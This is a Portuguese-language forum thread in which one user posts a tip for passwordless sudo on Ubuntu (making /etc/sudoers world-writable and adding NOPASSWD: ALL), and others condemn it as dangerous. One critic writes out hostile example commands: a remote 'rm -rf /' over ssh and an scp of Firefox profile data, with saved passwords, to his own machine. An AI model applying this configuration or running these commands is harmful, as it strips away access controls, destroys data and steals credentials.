Sudo sem pedir a senha (Modo não seguro)

[geleka]

jaz fiz um tutorial para ter uma senha do tamanho que quiser que foi muito criticado por acabar com toda filosofia de segurança do linux porisso
tento me redimir com outra dica  que resolve o problema de segurança e atinge o meu primeiro objetivo praticidade no uso de tarefas administrativas .

se você  tem seu ubuntu atualizado com certeza não sera possivel editar o  arquivo de configuração do sudo

Código Selecionar Expandir

sudo  chmod 777  /etc/sudoers

após isso editaremos o arquivo   

Código Selecionar Expandir

sudo gedit /etc/sudoers

descomentando a seguinte linha %sudo ALL=NOPASSWD: ALL  (((retirar o #da frente)))   

e modificar a primeira linha descomentada para isso 


root  ALL=(ALL) NOPASSWD: ALL >>>>>>para>>>>> system_username ALL=(ALL) NOPASSWD: ALL


salve e de as antigas permissões ao arquivo para que o sudo volte a funcionar 

Código Selecionar Expandir

sudo  chmod 440  /etc/sudoers

[clcampos]

Acho esta sua dica tão (ou mais) prejudicial que a outra.

Se antes estava facilitando para que descobrissem sua senha, com esta sua "dica" (que só pode ficar entre aspas) agora nem este trabalho terão.

Tem gente que caça mesmo!

[Ubiracy_Mafra]

Só uma pessoa muito burra pra deixar o sudo sem senha.

[raidicar]

Fiquei abismado, e se a pessoa tiver um servidor ssh (basta dar o comando apt-get install sshd)?
O usuário pode nem saber que tem o servidor ssh ativo, basta ter seguido um dia, uma dica, em que deu esse comando.
Para acabar com o micro da pessoa basta digitar no seu computador o comando:

Código Selecionar Expandir

ssh root@ip "rm -rf /"
Ele não permite que nos conectemos no micro sem senha por ssh, mas ele roda o comando la dentro sem questionar.
Ou seja, seguir essa dica cria uma brecha que permite de certa forma, autenticação ssh sem senha, como root, o porquê, não me aprofundei para saber, sei que ao tentar conexão ssh root@ip ele apenas pensa, mas ao rodar um comando, ele cai no shell e ao entrar no micro via ssh percebe-se que o comando foi executado la dentro.
O comando ssh root@ip "scp -r [firefox] root@meuip:/destino" traz os dados do firefox de outro micro para o meu micro e como todos sabem, o firefox agora permite que vizualizemos nossas senhas salvas e, uma pessoa prática como o geleka, salva a senha do e-mail, forum e outras coisas no firefox para não ter de digita-las todo dia. Resumindo, danou-se.

Para ser justo, vou testar e ver se o mesmo ocorre com a versão mais atual do ssh, pois utilizo nas estações outra versão, as estações finais são antigas apenas com o modo texto e apenas com o usuário root ativo. Provavelmente, o problema deve ocorrer, até por que não é uma falha do sistema, é uma falha do usuário.

Sei como fazer para deixar o root sem senha, o usuário do sistema sem senha, autenticação no samba sem senha, autenticação no squid sem senha, ssh sem senha e sem chave, eu posso simplesmente tirar todas as senha do meu sistema, posso liberar internet no celular de qualquer modelo sem qualquer tipo de autenticação, posso deixar até o meu e-mail do gmail sem senha. É pratico claro que é, não ter de digitar senha é muito prático, Mas não creio que seja util ensinar a como fazer isso, então, não posto. E se alguém perguntar em um tópico: Como conectar por vnc remotamente sem senha, eu não respondo e, se responder será algo do tipo: deixa de ser preguiçoso e escolha uma senha, seu fanfarrão.


Digamos que um gerente de banco lhe de cartões de debito e credito sem senha dizendo, basta passar no caixa e o dinheiro sai você aceitaria? Seria mais pratico, claro, você aceitaria? E se alguém divulgasse uma seqüência de teclas que, digitadas em um caixa eletrônico, retirasse a senha do cartão inserido, o fazendo funcionar sem senha, você acharia essa dica útil? Ou será que essa pessoa que posta a dica tem segundas intenções? Que deus lhe ajuda a nunca perder seu cartão, pois sua senha não valheria de nada, graças ao fulano que ensinou a como burlar a segurança do cartão e, nesse caso, o fulano é VOCÊ.

Então vamos lá, você já mostrou como diminuir a senha, agora ensinou a como fazer o sudo funcionar sem senha, então, o próximo passo do seu 'objetivo de praticidade' seria, deixe me ver, liberar o acesso remoto sem senha? Acertei? Considero seu post mais do que inútil, considero-o perigoso.

Essa é a pergunta que me vem a mente ao ler mais um tópico seu seguindo a mesma linha de raciocínio, seria o geleka ignorante (no sentido de não possuir o conhecimento necessário para postar uma dica) ou mal intencionado? Sinceramente, agora acho que você é mal intencionado.

[felipeborges]

Basicamente transformar uma boa estrutura de segurança num Window$ da vida! 

[geleka]

campanha por um linux menos seguro !!!!



foi mal  ((sim foi pessimo)))) me desculpo




mais no caso do banco uma leitura biométrica  seria mais pratico e tão quanto ou mais  que umas senhas

sua resposta mudou meu ponto de vista com relação a segurança 

[carloss]

ahh,
eu deixo sem senha mesmo..

não tenho servidor ssh rodando,
só eu uso meu pc..

não to nem aí pra isso

[ChausDevereaux]

ahh,
eu deixo sem senha mesmo..

não tenho servidor ssh rodando,
só eu uso meu pc..

não to nem aí pra isso

Parabéns, champz.